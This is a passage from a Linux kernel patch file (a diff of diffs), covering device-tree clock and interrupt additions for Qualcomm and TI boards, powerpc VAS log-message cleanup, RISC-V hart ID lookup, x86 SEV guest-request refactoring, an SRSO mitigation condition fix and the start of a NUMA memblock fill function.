+ 				 <&rpmhcc RPMH_CXO_CLK_A>, <&sleep_clk>,
+ 				 <0>, <&pcie1_lane>,
+-				 <0>, <0>, <0>, <0>;
++				 <0>, <0>, <0>,
++				 <&usb_1_ssphy>;
+ 			clock-names = "bi_tcxo", "bi_tcxo_ao", "sleep_clk",
+ 				      "pcie_0_pipe_clk", "pcie_1_pipe_clk",
+ 				      "ufs_phy_rx_symbol_0_clk", "ufs_phy_rx_symbol_1_clk",
+@@ -5337,6 +5338,14 @@
+ 			reg = <0 0x18591000 0 0x1000>,
+ 			      <0 0x18592000 0 0x1000>,
+ 			      <0 0x18593000 0 0x1000>;
++
++			interrupts = <GIC_SPI 30 IRQ_TYPE_LEVEL_HIGH>,
++				     <GIC_SPI 31 IRQ_TYPE_LEVEL_HIGH>,
++				     <GIC_SPI 19 IRQ_TYPE_LEVEL_HIGH>;
++			interrupt-names = "dcvsh-irq-0",
++					  "dcvsh-irq-1",
++					  "dcvsh-irq-2";
++
+ 			clocks = <&rpmhcc RPMH_CXO_CLK>, <&gcc GCC_GPLL0>;
+ 			clock-names = "xo", "alternate";
+ 			#freq-domain-cells = <1>;
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-cheza.dtsi b/arch/arm64/boot/dts/qcom/sdm845-cheza.dtsi
+index b5f11fbcc3004..a5c0c788969fb 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-cheza.dtsi
++++ b/arch/arm64/boot/dts/qcom/sdm845-cheza.dtsi
+@@ -145,6 +145,10 @@
+ 	};
+ };
+ 
++&cpufreq_hw {
++	/delete-property/ interrupts-extended; /* reference to lmh_cluster[01] */
++};
++
+ &psci {
+ 	/delete-node/ cpu0;
+ 	/delete-node/ cpu1;
+@@ -277,6 +281,14 @@
+ 			   &CLUSTER_SLEEP_0>;
+ };
+ 
++&lmh_cluster0 {
++	status = "disabled";
++};
++
++&lmh_cluster1 {
++	status = "disabled";
++};
++
+ /*
+  * Reserved memory changes
+  *
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-mtp.dts b/arch/arm64/boot/dts/qcom/sdm845-mtp.dts
+index de2d10e0315af..64958dee17d8b 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-mtp.dts
++++ b/arch/arm64/boot/dts/qcom/sdm845-mtp.dts
+@@ -714,6 +714,8 @@
+ 	vdd-1.8-xo-supply = <&vreg_l7a_1p8>;
+ 	vdd-1.3-rfa-supply = <&vreg_l17a_1p3>;
+ 	vdd-3.3-ch0-supply = <&vreg_l25a_3p3>;
++
++	qcom,snoc-host-cap-8bit-quirk;
+ };
+ 
+ /* PINCTRL - additions to nodes defined in sdm845.dtsi */
+diff --git a/arch/arm64/boot/dts/qcom/sm8150.dtsi b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+index de794a5078dfc..c586378fc6bc7 100644
+--- a/arch/arm64/boot/dts/qcom/sm8150.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+@@ -1839,8 +1839,12 @@
+ 			ranges;
+ 			clocks = <&gcc GCC_PCIE_PHY_AUX_CLK>,
+ 				 <&gcc GCC_PCIE_0_CFG_AHB_CLK>,
++				 <&gcc GCC_PCIE_0_CLKREF_CLK>,
+ 				 <&gcc GCC_PCIE0_PHY_REFGEN_CLK>;
+-			clock-names = "aux", "cfg_ahb", "refgen";
++			clock-names = "aux",
++				      "cfg_ahb",
++				      "ref",
++				      "refgen";
+ 
+ 			resets = <&gcc GCC_PCIE_0_PHY_BCR>;
+ 			reset-names = "phy";
+@@ -1938,8 +1942,12 @@
+ 			ranges;
+ 			clocks = <&gcc GCC_PCIE_PHY_AUX_CLK>,
+ 				 <&gcc GCC_PCIE_1_CFG_AHB_CLK>,
++				 <&gcc GCC_PCIE_1_CLKREF_CLK>,
+ 				 <&gcc GCC_PCIE1_PHY_REFGEN_CLK>;
+-			clock-names = "aux", "cfg_ahb", "refgen";
++			clock-names = "aux",
++				      "cfg_ahb",
++				      "ref",
++				      "refgen";
+ 
+ 			resets = <&gcc GCC_PCIE_1_PHY_BCR>;
+ 			reset-names = "phy";
+diff --git a/arch/arm64/boot/dts/qcom/sm8350.dtsi b/arch/arm64/boot/dts/qcom/sm8350.dtsi
+index b3245b13b2611..793768a2c9e1e 100644
+--- a/arch/arm64/boot/dts/qcom/sm8350.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8350.dtsi
+@@ -1778,7 +1778,7 @@
+ 			};
+ 
+ 			qup_uart18_default: qup-uart18-default-state {
+-				pins = "gpio58", "gpio59";
++				pins = "gpio68", "gpio69";
+ 				function = "qup18";
+ 				drive-strength = <2>;
+ 				bias-disable;
+diff --git a/arch/arm64/boot/dts/ti/k3-am62a7-sk.dts b/arch/arm64/boot/dts/ti/k3-am62a7-sk.dts
+index b08a083d722d4..7f265c671654d 100644
+--- a/arch/arm64/boot/dts/ti/k3-am62a7-sk.dts
++++ b/arch/arm64/boot/dts/ti/k3-am62a7-sk.dts
+@@ -172,7 +172,7 @@
+ 	status = "okay";
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&main_i2c1_pins_default>;
+-	clock-frequency = <400000>;
++	clock-frequency = <100000>;
+ 
+ 	exp1: gpio@22 {
+ 		compatible = "ti,tca6424";
+diff --git a/arch/arm64/include/asm/cputype.h b/arch/arm64/include/asm/cputype.h
+index 357932938b5ab..7dce9c0aa7836 100644
+--- a/arch/arm64/include/asm/cputype.h
++++ b/arch/arm64/include/asm/cputype.h
+@@ -85,7 +85,8 @@
+ #define ARM_CPU_PART_NEOVERSE_N2	0xD49
+ #define ARM_CPU_PART_CORTEX_A78C	0xD4B
+ 
+-#define APM_CPU_PART_POTENZA		0x000
++#define APM_CPU_PART_XGENE		0x000
++#define APM_CPU_VAR_POTENZA		0x00
+ 
+ #define CAVIUM_CPU_PART_THUNDERX	0x0A1
+ #define CAVIUM_CPU_PART_THUNDERX_81XX	0x0A2
+diff --git a/arch/arm64/kvm/guest.c b/arch/arm64/kvm/guest.c
+index dd20b8688d230..f44ae09a51956 100644
+--- a/arch/arm64/kvm/guest.c
++++ b/arch/arm64/kvm/guest.c
+@@ -863,7 +863,7 @@ u32 __attribute_const__ kvm_target_cpu(void)
+ 		break;
+ 	case ARM_CPU_IMP_APM:
+ 		switch (part_number) {
+-		case APM_CPU_PART_POTENZA:
++		case APM_CPU_PART_XGENE:
+ 			return KVM_ARM_TARGET_XGENE_POTENZA;
+ 		}
+ 		break;
+diff --git a/arch/powerpc/include/asm/nohash/32/pte-40x.h b/arch/powerpc/include/asm/nohash/32/pte-40x.h
+index 2d3153cfc0d79..acf61242e85bf 100644
+--- a/arch/powerpc/include/asm/nohash/32/pte-40x.h
++++ b/arch/powerpc/include/asm/nohash/32/pte-40x.h
+@@ -69,9 +69,6 @@
+ 
+ #define _PTE_NONE_MASK	0
+ 
+-/* Until my rework is finished, 40x still needs atomic PTE updates */
+-#define PTE_ATOMIC_UPDATES	1
+-
+ #define _PAGE_BASE_NC	(_PAGE_PRESENT | _PAGE_ACCESSED)
+ #define _PAGE_BASE	(_PAGE_BASE_NC)
+ 
+diff --git a/arch/powerpc/kernel/traps.c b/arch/powerpc/kernel/traps.c
+index 9bdd79aa51cfc..3956f32682c62 100644
+--- a/arch/powerpc/kernel/traps.c
++++ b/arch/powerpc/kernel/traps.c
+@@ -1164,6 +1164,7 @@ static void emulate_single_step(struct pt_regs *regs)
+ 		__single_step_exception(regs);
+ }
+ 
++#ifdef CONFIG_PPC_FPU_REGS
+ static inline int __parse_fpscr(unsigned long fpscr)
+ {
+ 	int ret = FPE_FLTUNK;
+@@ -1190,6 +1191,7 @@ static inline int __parse_fpscr(unsigned long fpscr)
+ 
+ 	return ret;
+ }
++#endif
+ 
+ static void parse_fpe(struct pt_regs *regs)
+ {
+diff --git a/arch/powerpc/perf/imc-pmu.c b/arch/powerpc/perf/imc-pmu.c
+index 9d229ef7f86ef..ada817c49b722 100644
+--- a/arch/powerpc/perf/imc-pmu.c
++++ b/arch/powerpc/perf/imc-pmu.c
+@@ -51,7 +51,7 @@ static int trace_imc_mem_size;
+  * core and trace-imc
+  */
+ static struct imc_pmu_ref imc_global_refc = {
+-	.lock = __SPIN_LOCK_INITIALIZER(imc_global_refc.lock),
++	.lock = __SPIN_LOCK_UNLOCKED(imc_global_refc.lock),
+ 	.id = 0,
+ 	.refc = 0,
+ };
+diff --git a/arch/powerpc/platforms/book3s/vas-api.c b/arch/powerpc/platforms/book3s/vas-api.c
+index 40f5ae5e1238d..92e60cb3163fa 100644
+--- a/arch/powerpc/platforms/book3s/vas-api.c
++++ b/arch/powerpc/platforms/book3s/vas-api.c
+@@ -4,6 +4,8 @@
+  * Copyright (C) 2019 Haren Myneni, IBM Corp
+  */
+ 
++#define pr_fmt(fmt)	"vas-api: " fmt
++
+ #include <linux/kernel.h>
+ #include <linux/device.h>
+ #include <linux/cdev.h>
+@@ -78,7 +80,7 @@ int get_vas_user_win_ref(struct vas_user_win_ref *task_ref)
+ 	task_ref->mm = get_task_mm(current);
+ 	if (!task_ref->mm) {
+ 		put_pid(task_ref->pid);
+-		pr_err("VAS: pid(%d): mm_struct is not found\n",
++		pr_err("pid(%d): mm_struct is not found\n",
+ 				current->pid);
+ 		return -EPERM;
+ 	}
+@@ -235,8 +237,7 @@ void vas_update_csb(struct coprocessor_request_block *crb,
+ 	rc = kill_pid_info(SIGSEGV, &info, pid);
+ 	rcu_read_unlock();
+ 
+-	pr_devel("%s(): pid %d kill_proc_info() rc %d\n", __func__,
+-			pid_vnr(pid), rc);
++	pr_devel("pid %d kill_proc_info() rc %d\n", pid_vnr(pid), rc);
+ }
+ 
+ void vas_dump_crb(struct coprocessor_request_block *crb)
+@@ -294,7 +295,7 @@ static int coproc_ioc_tx_win_open(struct file *fp, unsigned long arg)
+ 
+ 	rc = copy_from_user(&uattr, uptr, sizeof(uattr));
+ 	if (rc) {
+-		pr_err("%s(): copy_from_user() returns %d\n", __func__, rc);
++		pr_err("copy_from_user() returns %d\n", rc);
+ 		return -EFAULT;
+ 	}
+ 
+@@ -311,7 +312,7 @@ static int coproc_ioc_tx_win_open(struct file *fp, unsigned long arg)
+ 	txwin = cp_inst->coproc->vops->open_win(uattr.vas_id, uattr.flags,
+ 						cp_inst->coproc->cop_type);
+ 	if (IS_ERR(txwin)) {
+-		pr_err("%s() VAS window open failed, %ld\n", __func__,
++		pr_err_ratelimited("VAS window open failed rc=%ld\n",
+ 				PTR_ERR(txwin));
+ 		return PTR_ERR(txwin);
+ 	}
+@@ -405,8 +406,7 @@ static vm_fault_t vas_mmap_fault(struct vm_fault *vmf)
+ 	 * window is not opened. Shouldn't expect this error.
+ 	 */
+ 	if (!cp_inst || !cp_inst->txwin) {
+-		pr_err("%s(): Unexpected fault on paste address with TX window closed\n",
+-				__func__);
++		pr_err("Unexpected fault on paste address with TX window closed\n");
+ 		return VM_FAULT_SIGBUS;
+ 	}
+ 
+@@ -421,8 +421,7 @@ static vm_fault_t vas_mmap_fault(struct vm_fault *vmf)
+ 	 * issue NX request.
+ 	 */
+ 	if (txwin->task_ref.vma != vmf->vma) {
+-		pr_err("%s(): No previous mapping with paste address\n",
+-			__func__);
++		pr_err("No previous mapping with paste address\n");
+ 		return VM_FAULT_SIGBUS;
+ 	}
+ 
+@@ -481,19 +480,19 @@ static int coproc_mmap(struct file *fp, struct vm_area_struct *vma)
+ 	txwin = cp_inst->txwin;
+ 
+ 	if ((vma->vm_end - vma->vm_start) > PAGE_SIZE) {
+-		pr_debug("%s(): size 0x%zx, PAGE_SIZE 0x%zx\n", __func__,
++		pr_debug("size 0x%zx, PAGE_SIZE 0x%zx\n",
+ 				(vma->vm_end - vma->vm_start), PAGE_SIZE);
+ 		return -EINVAL;
+ 	}
+ 
+ 	/* Ensure instance has an open send window */
+ 	if (!txwin) {
+-		pr_err("%s(): No send window open?\n", __func__);
++		pr_err("No send window open?\n");
+ 		return -EINVAL;
+ 	}
+ 
+ 	if (!cp_inst->coproc->vops || !cp_inst->coproc->vops->paste_addr) {
+-		pr_err("%s(): VAS API is not registered\n", __func__);
++		pr_err("VAS API is not registered\n");
+ 		return -EACCES;
+ 	}
+ 
+@@ -510,14 +509,14 @@ static int coproc_mmap(struct file *fp, struct vm_area_struct *vma)
+ 	 */
+ 	mutex_lock(&txwin->task_ref.mmap_mutex);
+ 	if (txwin->status != VAS_WIN_ACTIVE) {
+-		pr_err("%s(): Window is not active\n", __func__);
++		pr_err("Window is not active\n");
+ 		rc = -EACCES;
+ 		goto out;
+ 	}
+ 
+ 	paste_addr = cp_inst->coproc->vops->paste_addr(txwin);
+ 	if (!paste_addr) {
+-		pr_err("%s(): Window paste address failed\n", __func__);
++		pr_err("Window paste address failed\n");
+ 		rc = -EINVAL;
+ 		goto out;
+ 	}
+@@ -533,8 +532,8 @@ static int coproc_mmap(struct file *fp, struct vm_area_struct *vma)
+ 	rc = remap_pfn_range(vma, vma->vm_start, pfn + vma->vm_pgoff,
+ 			vma->vm_end - vma->vm_start, prot);
+ 
+-	pr_devel("%s(): paste addr %llx at %lx, rc %d\n", __func__,
+-			paste_addr, vma->vm_start, rc);
++	pr_devel("paste addr %llx at %lx, rc %d\n", paste_addr,
++			vma->vm_start, rc);
+ 
+ 	txwin->task_ref.vma = vma;
+ 	vma->vm_ops = &vas_vm_ops;
+@@ -609,8 +608,7 @@ int vas_register_coproc_api(struct module *mod, enum vas_cop_type cop_type,
+ 		goto err;
+ 	}
+ 
+-	pr_devel("%s: Added dev [%d,%d]\n", __func__, MAJOR(devno),
+-			MINOR(devno));
++	pr_devel("Added dev [%d,%d]\n", MAJOR(devno), MINOR(devno));
+ 
+ 	return 0;
+ 
+diff --git a/arch/powerpc/platforms/pseries/lpar.c b/arch/powerpc/platforms/pseries/lpar.c
+index 2c2812a87d470..541199c6a587d 100644
+--- a/arch/powerpc/platforms/pseries/lpar.c
++++ b/arch/powerpc/platforms/pseries/lpar.c
+@@ -524,8 +524,10 @@ static ssize_t vcpudispatch_stats_write(struct file *file, const char __user *p,
+ 
+ 	if (cmd) {
+ 		rc = init_cpu_associativity();
+-		if (rc)
++		if (rc) {
++			destroy_cpu_associativity();
+ 			goto out;
++		}
+ 
+ 		for_each_possible_cpu(cpu) {
+ 			disp = per_cpu_ptr(&vcpu_disp_data, cpu);
+diff --git a/arch/powerpc/platforms/pseries/vas.c b/arch/powerpc/platforms/pseries/vas.c
+index 041a25c08066b..5db8060776b0c 100644
+--- a/arch/powerpc/platforms/pseries/vas.c
++++ b/arch/powerpc/platforms/pseries/vas.c
+@@ -340,7 +340,7 @@ static struct vas_window *vas_allocate_window(int vas_id, u64 flags,
+ 
+ 	if (atomic_inc_return(&cop_feat_caps->nr_used_credits) >
+ 			atomic_read(&cop_feat_caps->nr_total_credits)) {
+-		pr_err("Credits are not available to allocate window\n");
++		pr_err_ratelimited("Credits are not available to allocate window\n");
+ 		rc = -EINVAL;
+ 		goto out;
+ 	}
+@@ -423,7 +423,7 @@ static struct vas_window *vas_allocate_window(int vas_id, u64 flags,
+ 
+ 	put_vas_user_win_ref(&txwin->vas_win.task_ref);
+ 	rc = -EBUSY;
+-	pr_err("No credit is available to allocate window\n");
++	pr_err_ratelimited("No credit is available to allocate window\n");
+ 
+ out_free:
+ 	/*
+diff --git a/arch/powerpc/sysdev/xive/native.c b/arch/powerpc/sysdev/xive/native.c
+index 3925825954bcc..e5baa91ddd07b 100644
+--- a/arch/powerpc/sysdev/xive/native.c
++++ b/arch/powerpc/sysdev/xive/native.c
+@@ -804,7 +804,7 @@ int xive_native_get_queue_info(u32 vp_id, u32 prio,
+ 	if (out_qpage)
+ 		*out_qpage = be64_to_cpu(qpage);
+ 	if (out_qsize)
+-		*out_qsize = be32_to_cpu(qsize);
++		*out_qsize = be64_to_cpu(qsize);
+ 	if (out_qeoi_page)
+ 		*out_qeoi_page = be64_to_cpu(qeoi_page);
+ 	if (out_escalate_irq)
+diff --git a/arch/riscv/kernel/cpu.c b/arch/riscv/kernel/cpu.c
+index 852ecccd8920f..0f76181dc634d 100644
+--- a/arch/riscv/kernel/cpu.c
++++ b/arch/riscv/kernel/cpu.c
+@@ -57,13 +57,14 @@ int riscv_of_processor_hartid(struct device_node *node, unsigned long *hart)
+  */
+ int riscv_of_parent_hartid(struct device_node *node, unsigned long *hartid)
+ {
+-	int rc;
+-
+ 	for (; node; node = node->parent) {
+ 		if (of_device_is_compatible(node, "riscv")) {
+-			rc = riscv_of_processor_hartid(node, hartid);
+-			if (!rc)
+-				return 0;
++			*hartid = (unsigned long)of_get_cpu_hwid(node, 0);
++			if (*hartid == ~0UL) {
++				pr_warn("Found CPU without hart ID\n");
++				return -ENODEV;
++			}
++			return 0;
+ 		}
+ 	}
+ 
+diff --git a/arch/sh/Kconfig.debug b/arch/sh/Kconfig.debug
+index c449e7c1b20ff..8bcd6c1431a95 100644
+--- a/arch/sh/Kconfig.debug
++++ b/arch/sh/Kconfig.debug
+@@ -22,6 +22,17 @@ config STACK_DEBUG
+ 	  every function call and will therefore incur a major
+ 	  performance hit. Most users should say N.
+ 
++config EARLY_PRINTK
++	bool "Early printk"
++	depends on SH_STANDARD_BIOS
++	help
++	  Say Y here to redirect kernel printk messages to the serial port
++	  used by the SH-IPL bootloader, starting very early in the boot
++	  process and ending when the kernel's serial console is initialised.
++	  This option is only useful while porting the kernel to a new machine,
++	  when the kernel may crash or hang before the serial console is
++	  initialised.  If unsure, say N.
++
+ config 4KSTACKS
+ 	bool "Use 4Kb for kernel stacks instead of 8Kb"
+ 	depends on DEBUG_KERNEL && (MMU || BROKEN) && !PAGE_SIZE_64KB
+diff --git a/arch/x86/include/asm/sev-common.h b/arch/x86/include/asm/sev-common.h
+index b63be696b776a..0759af9b1acfc 100644
+--- a/arch/x86/include/asm/sev-common.h
++++ b/arch/x86/include/asm/sev-common.h
+@@ -128,10 +128,6 @@ struct snp_psc_desc {
+ 	struct psc_entry entries[VMGEXIT_PSC_MAX_ENTRY];
+ } __packed;
+ 
+-/* Guest message request error codes */
+-#define SNP_GUEST_REQ_INVALID_LEN	BIT_ULL(32)
+-#define SNP_GUEST_REQ_ERR_BUSY		BIT_ULL(33)
+-
+ #define GHCB_MSR_TERM_REQ		0x100
+ #define GHCB_MSR_TERM_REASON_SET_POS	12
+ #define GHCB_MSR_TERM_REASON_SET_MASK	0xf
+diff --git a/arch/x86/include/asm/sev.h b/arch/x86/include/asm/sev.h
+index a0a58c4122ec3..7ca5c9ec8b52e 100644
+--- a/arch/x86/include/asm/sev.h
++++ b/arch/x86/include/asm/sev.h
+@@ -9,6 +9,8 @@
+ #define __ASM_ENCRYPTED_STATE_H
+ 
+ #include <linux/types.h>
++#include <linux/sev-guest.h>
++
+ #include <asm/insn.h>
+ #include <asm/sev-common.h>
+ #include <asm/bootparam.h>
+@@ -185,6 +187,9 @@ static inline int pvalidate(unsigned long vaddr, bool rmp_psize, bool validate)
+ 
+ 	return rc;
+ }
++
++struct snp_guest_request_ioctl;
++
+ void setup_ghcb(void);
+ void __init early_snp_set_memory_private(unsigned long vaddr, unsigned long paddr,
+ 					 unsigned long npages);
+@@ -196,7 +201,7 @@ void snp_set_memory_private(unsigned long vaddr, unsigned long npages);
+ void snp_set_wakeup_secondary_cpu(void);
+ bool snp_init(struct boot_params *bp);
+ void __init __noreturn snp_abort(void);
+-int snp_issue_guest_request(u64 exit_code, struct snp_req_data *input, unsigned long *fw_err);
++int snp_issue_guest_request(u64 exit_code, struct snp_req_data *input, struct snp_guest_request_ioctl *rio);
+ #else
+ static inline void sev_es_ist_enter(struct pt_regs *regs) { }
+ static inline void sev_es_ist_exit(void) { }
+@@ -216,8 +221,7 @@ static inline void snp_set_memory_private(unsigned long vaddr, unsigned long npa
+ static inline void snp_set_wakeup_secondary_cpu(void) { }
+ static inline bool snp_init(struct boot_params *bp) { return false; }
+ static inline void snp_abort(void) { }
+-static inline int snp_issue_guest_request(u64 exit_code, struct snp_req_data *input,
+-					  unsigned long *fw_err)
++static inline int snp_issue_guest_request(u64 exit_code, struct snp_req_data *input, struct snp_guest_request_ioctl *rio)
+ {
+ 	return -ENOTTY;
+ }
+diff --git a/arch/x86/include/asm/sparsemem.h b/arch/x86/include/asm/sparsemem.h
+index 64df897c0ee30..1be13b2dfe8bf 100644
+--- a/arch/x86/include/asm/sparsemem.h
++++ b/arch/x86/include/asm/sparsemem.h
+@@ -37,6 +37,8 @@ extern int phys_to_target_node(phys_addr_t start);
+ #define phys_to_target_node phys_to_target_node
+ extern int memory_add_physaddr_to_nid(u64 start);
+ #define memory_add_physaddr_to_nid memory_add_physaddr_to_nid
++extern int numa_fill_memblks(u64 start, u64 end);
++#define numa_fill_memblks numa_fill_memblks
+ #endif
+ #endif /* __ASSEMBLY__ */
+ 
+diff --git a/arch/x86/include/asm/uaccess.h b/arch/x86/include/asm/uaccess.h
+index 1cc756eafa447..6ca0c661cb637 100644
+--- a/arch/x86/include/asm/uaccess.h
++++ b/arch/x86/include/asm/uaccess.h
+@@ -518,7 +518,7 @@ copy_mc_to_kernel(void *to, const void *from, unsigned len);
+ #define copy_mc_to_kernel copy_mc_to_kernel
+ 
+ unsigned long __must_check
+-copy_mc_to_user(void *to, const void *from, unsigned len);
++copy_mc_to_user(void __user *to, const void *from, unsigned len);
+ #endif
+ 
+ /*
+diff --git a/arch/x86/kernel/amd_nb.c b/arch/x86/kernel/amd_nb.c
+index 7e331e8f36929..8ea24df3c5ff1 100644
+--- a/arch/x86/kernel/amd_nb.c
++++ b/arch/x86/kernel/amd_nb.c
+@@ -100,6 +100,9 @@ static const struct pci_device_id amd_nb_link_ids[] = {
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_AMD, PCI_DEVICE_ID_AMD_19H_M10H_DF_F4) },
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_AMD, PCI_DEVICE_ID_AMD_19H_M40H_DF_F4) },
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_AMD, PCI_DEVICE_ID_AMD_19H_M50H_DF_F4) },
++	{ PCI_DEVICE(PCI_VENDOR_ID_AMD, PCI_DEVICE_ID_AMD_19H_M60H_DF_F4) },
++	{ PCI_DEVICE(PCI_VENDOR_ID_AMD, PCI_DEVICE_ID_AMD_19H_M70H_DF_F4) },
++	{ PCI_DEVICE(PCI_VENDOR_ID_AMD, PCI_DEVICE_ID_AMD_19H_M78H_DF_F4) },
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_AMD, PCI_DEVICE_ID_AMD_CNB17H_F4) },
+ 	{}
+ };
+diff --git a/arch/x86/kernel/cpu/bugs.c b/arch/x86/kernel/cpu/bugs.c
+index 263df737d5cd5..13dffc43ded02 100644
+--- a/arch/x86/kernel/cpu/bugs.c
++++ b/arch/x86/kernel/cpu/bugs.c
+@@ -2477,7 +2477,7 @@ static void __init srso_select_mitigation(void)
+ 	pr_info("%s%s\n", srso_strings[srso_mitigation], (has_microcode ? "" : ", no microcode"));
+ 
+ pred_cmd:
+-	if ((boot_cpu_has(X86_FEATURE_SRSO_NO) || srso_cmd == SRSO_CMD_OFF) &&
++	if ((!boot_cpu_has_bug(X86_BUG_SRSO) || srso_cmd == SRSO_CMD_OFF) &&
+ 	     boot_cpu_has(X86_FEATURE_SBPB))
+ 		x86_pred_cmd = PRED_CMD_SBPB;
+ }
+diff --git a/arch/x86/kernel/head64.c b/arch/x86/kernel/head64.c
+index 6a3cfaf6b72ad..84adf12a76d3c 100644
+--- a/arch/x86/kernel/head64.c
++++ b/arch/x86/kernel/head64.c
+@@ -80,7 +80,7 @@ static struct desc_struct startup_gdt[GDT_ENTRIES] = {
+  * while the kernel still uses a direct mapping.
+  */
+ static struct desc_ptr startup_gdt_descr = {
+-	.size = sizeof(startup_gdt),
++	.size = sizeof(startup_gdt)-1,
+ 	.address = 0,
+ };
+ 
+diff --git a/arch/x86/kernel/sev.c b/arch/x86/kernel/sev.c
+index e7968c41ecf57..68b2a9d3dbc6b 100644
+--- a/arch/x86/kernel/sev.c
++++ b/arch/x86/kernel/sev.c
+@@ -22,6 +22,8 @@
+ #include <linux/efi.h>
+ #include <linux/platform_device.h>
+ #include <linux/io.h>
++#include <linux/psp-sev.h>
++#include <uapi/linux/sev-guest.h>
+ 
+ #include <asm/cpu_entry_area.h>
+ #include <asm/stacktrace.h>
+@@ -2205,7 +2207,7 @@ static int __init init_sev_config(char *str)
+ }
+ __setup("sev=", init_sev_config);
+ 
+-int snp_issue_guest_request(u64 exit_code, struct snp_req_data *input, unsigned long *fw_err)
++int snp_issue_guest_request(u64 exit_code, struct snp_req_data *input, struct snp_guest_request_ioctl *rio)
+ {
+ 	struct ghcb_state state;
+ 	struct es_em_ctxt ctxt;
+@@ -2213,8 +2215,7 @@ int snp_issue_guest_request(u64 exit_code, struct snp_req_data *input, unsigned
+ 	struct ghcb *ghcb;
+ 	int ret;
+ 
+-	if (!fw_err)
+-		return -EINVAL;
++	rio->exitinfo2 = SEV_RET_NO_FW_CALL;
+ 
+ 	/*
+ 	 * __sev_get_ghcb() needs to run with IRQs disabled because it is using
+@@ -2239,16 +2240,16 @@ int snp_issue_guest_request(u64 exit_code, struct snp_req_data *input, unsigned
+ 	if (ret)
+ 		goto e_put;
+ 
+-	*fw_err = ghcb->save.sw_exit_info_2;
+-	switch (*fw_err) {
++	rio->exitinfo2 = ghcb->save.sw_exit_info_2;
++	switch (rio->exitinfo2) {
+ 	case 0:
+ 		break;
+ 
+-	case SNP_GUEST_REQ_ERR_BUSY:
++	case SNP_GUEST_VMM_ERR(SNP_GUEST_VMM_ERR_BUSY):
+ 		ret = -EAGAIN;
+ 		break;
+ 
+-	case SNP_GUEST_REQ_INVALID_LEN:
++	case SNP_GUEST_VMM_ERR(SNP_GUEST_VMM_ERR_INVALID_LEN):
+ 		/* Number of expected pages are returned in RBX */
+ 		if (exit_code == SVM_VMGEXIT_EXT_GUEST_REQUEST) {
+ 			input->data_npages = ghcb_get_rbx(ghcb);
+diff --git a/arch/x86/lib/copy_mc.c b/arch/x86/lib/copy_mc.c
+index 80efd45a77617..6e8b7e600def5 100644
+--- a/arch/x86/lib/copy_mc.c
++++ b/arch/x86/lib/copy_mc.c
+@@ -70,23 +70,23 @@ unsigned long __must_check copy_mc_to_kernel(void *dst, const void *src, unsigne
+ }
+ EXPORT_SYMBOL_GPL(copy_mc_to_kernel);
+ 
+-unsigned long __must_check copy_mc_to_user(void *dst, const void *src, unsigned len)
++unsigned long __must_check copy_mc_to_user(void __user *dst, const void *src, unsigned len)
+ {
+ 	unsigned long ret;
+ 
+ 	if (copy_mc_fragile_enabled) {
+ 		__uaccess_begin();
+-		ret = copy_mc_fragile(dst, src, len);
++		ret = copy_mc_fragile((__force void *)dst, src, len);
+ 		__uaccess_end();
+ 		return ret;
+ 	}
+ 
+ 	if (static_cpu_has(X86_FEATURE_ERMS)) {
+ 		__uaccess_begin();
+-		ret = copy_mc_enhanced_fast_string(dst, src, len);
++		ret = copy_mc_enhanced_fast_string((__force void *)dst, src, len);
+ 		__uaccess_end();
+ 		return ret;
+ 	}
+ 
+-	return copy_user_generic(dst, src, len);
++	return copy_user_generic((__force void *)dst, src, len);
+ }
+diff --git a/arch/x86/mm/maccess.c b/arch/x86/mm/maccess.c
+index 5a53c2cc169cc..6993f026adec9 100644
+--- a/arch/x86/mm/maccess.c
++++ b/arch/x86/mm/maccess.c
+@@ -9,12 +9,21 @@ bool copy_from_kernel_nofault_allowed(const void *unsafe_src, size_t size)
+ 	unsigned long vaddr = (unsigned long)unsafe_src;
+ 
+ 	/*
+-	 * Range covering the highest possible canonical userspace address
+-	 * as well as non-canonical address range. For the canonical range
+-	 * we also need to include the userspace guard page.
++	 * Do not allow userspace addresses.  This disallows
++	 * normal userspace and the userspace guard page:
+ 	 */
+-	return vaddr >= TASK_SIZE_MAX + PAGE_SIZE &&
+-	       __is_canonical_address(vaddr, boot_cpu_data.x86_virt_bits);
++	if (vaddr < TASK_SIZE_MAX + PAGE_SIZE)
++		return false;
++
++	/*
++	 * Allow everything during early boot before 'x86_virt_bits'
++	 * is initialized.  Needed for instruction decoding in early
++	 * exception handlers.
++	 */
++	if (!boot_cpu_data.x86_virt_bits)
++		return true;
++
++	return __is_canonical_address(vaddr, boot_cpu_data.x86_virt_bits);
+ }
+ #else
+ bool copy_from_kernel_nofault_allowed(const void *unsafe_src, size_t size)
+diff --git a/arch/x86/mm/numa.c b/arch/x86/mm/numa.c
+index 2aadb2019b4f2..c01c5506fd4ae 100644
+--- a/arch/x86/mm/numa.c
++++ b/arch/x86/mm/numa.c
+@@ -11,6 +11,7 @@
+ #include <linux/nodemask.h>
+ #include <linux/sched.h>
+ #include <linux/topology.h>
++#include <linux/sort.h>
+ 
+ #include <asm/e820/api.h>
+ #include <asm/proto.h>
+@@ -961,4 +962,83 @@ int memory_add_physaddr_to_nid(u64 start)
+ 	return nid;
+ }
+ EXPORT_SYMBOL_GPL(memory_add_physaddr_to_nid);
++
++static int __init cmp_memblk(const void *a, const void *b)
++{
++	const struct numa_memblk *ma = *(const struct numa_memblk **)a;
++	const struct numa_memblk *mb = *(const struct numa_memblk **)b;
++
++	return ma->start - mb->start;
++}
++
++static struct numa_memblk *numa_memblk_list[NR_NODE_MEMBLKS] __initdata;
++
++/**
++ * numa_fill_memblks - Fill gaps in numa_meminfo memblks
++ * @start: address to begin fill
++ * @end: address to end fill
++ *
++ * Find and extend numa_meminfo memblks to cover the @start-@end
++ * physical address range, such that the first memblk includes
++ * @start, the last memblk includes @end, and any gaps in between
++ * are filled.
++ *
++ * RETURNS:
++ * 0		  : Success
++ * NUMA_NO_MEMBLK : No memblk exists in @start-@end range
++ */
++
++int __init numa_fill_memblks(u64 start, u64 end)
++{
